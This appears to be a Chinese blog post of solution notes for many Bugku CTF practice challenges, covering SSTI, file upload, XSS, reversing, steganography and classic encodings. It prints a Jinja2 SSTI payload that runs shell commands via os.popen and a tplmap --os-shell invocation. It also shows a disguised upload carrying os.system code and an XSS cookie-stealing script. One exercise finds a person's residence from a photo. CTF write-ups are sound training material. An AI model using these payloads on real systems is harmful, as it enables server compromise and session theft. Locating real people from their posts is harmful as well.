ctf bugku

Simple_SSTI_1

在这里插入图片描述
查看源码
在这里插入图片描述
You need pass in a parameter named flag。
You know, in the flask, We often set a secret_key variable
您需要传入一个名为flag的参数
你知道,在烧瓶中,我们经常设置一个secret_key变量

http://114.67.175.224:19049/?flag={{config.SECRET_KEY}}
在这里插入图片描述

社工-进阶收集

提  示: flag{小美小区名字拼音}
描  述: 小明当年为了追求小美想尽办法获得小美的地址。直到有一天小美发了一条说说,小明觉得希望来了。 (实战改编题,难度降低了。)
在这里插入图片描述
解压后一个qq.png图片
在这里插入图片描述
打开shitu.baidu.com 上传qq.png

https://www.sohu.com/a/494802865_121146184

Simple_SSTI_2

描  述: Simple_SSTI_2

访问url打开后
You need pass in a parameter named flag

第一种方法:
/?flag={{ config.__class__.__init__.__globals__['os'].popen('cat ../app/flag').read() }}
http://114.67.175.224:14421/?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27cat%20../app/flag%27).read()%20}}

 2.方法2:是使用 tplmap(较简单)
使用lunix环境
git clone https://github.com/epinna/tplmap
cd tplmap
sudo yum install python-pip -y||sudo apt install python-pip #安装py2的pip
pip install -r requirements.txt

出现报错

└─# ./tplmap.py -u 'http://114.67.175.224:14421/?flag' --os-shell
Tplmap 0.5
    Automatic Server-Side Template Injection Detection and Exploitation Tool

Testing if GET parameter 'flag' is injectable
Exiting: module 'collections' has no attribute 'Mapping'

看了几篇文章还是有问题

Flask_FileUpload

只允许jpg,png
新建txt 写入

import os 
os.system('cat /flag')

更改后缀上传,查看源码
在这里插入图片描述

POST /uploader HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------239442212229849376713865788696
Content-Length: 254
Origin: http://114.67.175.224:13579
Connection: close
Referer: http://114.67.175.224:13579/
Upgrade-Insecure-Requests: 1

-----------------------------239442212229849376713865788696
Content-Disposition: form-data; name="file"; filename="te.jpg"
Content-Type: image/jpeg


import os 
os.system('cat /flag')
-----------------------------239442212229849376713865788696--

1和0的故事

1.txt内容如下

0000000001110010000000000
0000000000011110100000000
0000000001110001000000000
0000000010111100000000000
0000000010101010000000000
0000000001100010100000000
0000000010101010100000000
0000000001000001100000000
1100011101110110100011000
0001000010110010010010100
0100111101000011101110011
0011110100101011001001001
1000001001100001001101000
1111000111111011100101000
1011011111001101111110111
1000110110010010101101100
1000111100111111111110111
0000000010110001100010100
0000000010010100101010001
0000000010101010100011001
0000000000100111111110010
0000000000011001011110111
0000000001001100100100001
0000000011000011011011001
0000000011010000101110101

用word打开,使用白色方块替换掉0,黑色方块替换掉1 然后补齐定位,调整一下行间距
,定位符没画出来
在这里插入图片描述

借鉴

kali㉿kali)-[~/Desktop]
└─$ python3 2.py

在这里插入图片描述

easy_nbt

MISC
下载后
在这里插入图片描述
找到level.dat,改为7z,再解压,txt打开

在这里插入图片描述

留言板

提  示: 需要xss平台接收flag

[09:21:07] 200 -  289B  - /admin.php                                        
[09:21:28] 200 -    1KB - /index.php                                        
[09:21:28] 200 -    1KB - /index.php/login/ 

提交

<script>alert(document.cookie)</script>

在这里插入图片描述
爆破出来admin.php路径
账号密码,的路径没搞出来
登陆

admin/011be4d65feac1a8

之后即可弹出
在这里插入图片描述

flag%7Bb71cd5980d58bfd677caf9dff20621d8%7D
变换如下
flag{b71cd5980d58bfd677caf9dff20621d8}
即可成功

瑞士军刀

描  述: ls
没有返回,然后ls,就能看到目录,然后直接cat flag就可以得到flag了
在这里插入图片描述

入门逆向

下载后一个exe文件
在这里插入图片描述
报错40343的话目录不要有中文
在这里插入图片描述

使用ida打开
在这里插入图片描述
鼠标点击66H,按键盘R键,就可以显示出字符得到 flag

在这里插入图片描述
flag{Re_1s_S0_C0OL}

滑稽

查看元素
在这里插入图片描述

canary

描  述: canary绕过以及栈溢出
其  他: pwn4

给下载的文件赋权 并与运行,使用objdump -d pwn4命令进行反汇编,寻找段名找有意义的函数
在这里插入图片描述

在这里插入图片描述
暂未解出 跳过

file.rar
修改后缀为zip
解压后有一个2.png的使用
WinHex打开图片,“89504E0D0A1A0A”说明这是PNG图片,“0000000D”表示IHDR头部是13个字节,“000001F4”是宽度,“000001A4”是高度(以像素为单位),修改A4为F4,保存查看图片
在这里插入图片描述

在这里插入图片描述

telnet

MISC
描  述: key格式flag{xxxxxxxxxxxxxxxxxxxxxxxxxxx}
下载telnet.zip解压后
networking.pcap文件
txt打开搜索flag
在这里插入图片描述

眼见非实

MISC
下载文件未
眼见非实.docx更改后缀未zip
解压后在全局里面搜索flag

在这里插入图片描述

在这里插入图片描述

啊哒

MISC
描  述: 有趣的表情包

对图片分析含有多种属性
在这里插入图片描述
jpg-属性-照相机值 hex解码
在这里插入图片描述

图片后缀改为7z
在这里插入图片描述
输入密码解开flag.txt文件
在这里插入图片描述

/.-

描  述: …-./.-…/.-/–./----.–/-…/…–/…-./-.-./-…/…-./.----/–…/…-./----./…–/----./----./…/-----/…-/-----.-

https://www.atool99.com/morse.php
在这里插入图片描述

FLAG%u7bD3FCBF17F9399504%u7d
将解密后的字符%u7b和%u7d分别替换成{},其他字母小写
flag{d3fcbf17f9399504}

聪明的小羊

描  述: 一只小羊翻过了2个栅栏 fa{fe13f590lg6d46d0d0}

https://ctf.bugku.com/tool/railfence
解密即可

ok

题目链接
https://ctf.bugku.com/challenges/detail/id/48.html
描  述: Ook.

在这里插入图片描述
先把格式txt改为html,然后利用html空白字符只计算一个的特性把换行符全部换成空格,
利用以下网站进行解题 Ook! To Text
https://tool.bugku.com/brainfuck/
https://www.splitbrain.org/services/ook

在这里插入图片描述

[±<>]

描  述: +++++ +++++ [->++ +++++ +++<] >++.+ +++++ .<+++ [->-- -<]>- -.+++ +++.< ++++[ ->+++ +<]>+ +++.< +++++ +++[- >---- ----< ]>— ----- —.< +++++ ++[-> +++++ ++<]> +++.< +++++ +[->- ----- <]>-- ----- -.–. ----. --.++ +++++ +.<++ ++++[ ->+++ +++<] >++++ +.++. <++++ ++[-> ----- -<]>- ----- ----. -.<++ +++++ [->++ +++++ <]>+. ----. ++++. <++++ +++[- >---- —<] >---- .+.<+ +++++ ++[-> +++++ +++<] >++++ +++++ ++.<

复制到
https://tool.bugku.com/brainfuck/
brainfuck to text

  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

GuiltyFet

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值